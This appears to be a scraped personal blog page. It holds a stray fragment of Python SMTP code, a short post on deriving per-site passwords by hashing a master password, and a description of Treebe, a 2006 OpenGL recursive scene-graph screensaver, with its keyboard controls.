server.sendmail(fromaddr,toaddrs, msg)
server.quit()
For the longest time in my life I have only used a single password for all the online services until I realized how much of a bad idea that is.
However I still didn't want to start memorizing a huge set of different passwords for each service so I came up with a following scheme which allows me to remember a single master password while still providing different password for each service. The key is in using a scheme that combines a master password plus the username and name of an online service then running resulting combination through a hash function output of which is what actually ends up being used as a password.
Treebe is a program I have made a while ago, sometime in 2006, for a computer graphics class. I was learning OpenGL and relative coordinate system, so as an exercise I decided to write a screen-saver type program that would display a lot of objects in a recursive pattern utilizing relative coordinates via OpenGL's modelview matrix stack. I chose a pretty basic pattern of a parent object surrounded by 6 smaller children on each side. By changing relative position between parent and children I added animation.
I have also created a simple polymorphic scene-graph API to make the code more generalized and somewhat elegant. This scene graph is actually a tree (here is where Treebe name originated) where each child inherits from a base class - ANode, that represents a node in the scene. ANode has enough information to link to children and to describe their relative size, position and rotation to the parent. It also has a field for a display list (which made displaying lots of object a LOT faster) and a default virtual render() method that calls display list (unless it is overridden by a child class).
Simple pre-order traversal of the tree (call render() of each node before going to children) renders the whole scene. To animate Treebe specifically I only needed to make another tree traversal function that added same offset to each node which is a sinusoidal function (thus the whole thing expands and shrinks). As you can see from screenshot, several geometric objects can be used for each node which is done by another traversal that sets the display list id for each node. By twiddling with the default relative size of child to parent it is also possible to achieve different looking "orbits" (as example compare 2nd and 3rd screenshots).
Controls:
1-8 Change display list.
q, e Increase/decrease relative scale between parents and children.
-, shift + Decrease/increase recursion depth.
space Pause animation. Press again to step through it.
n Continue animation.
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.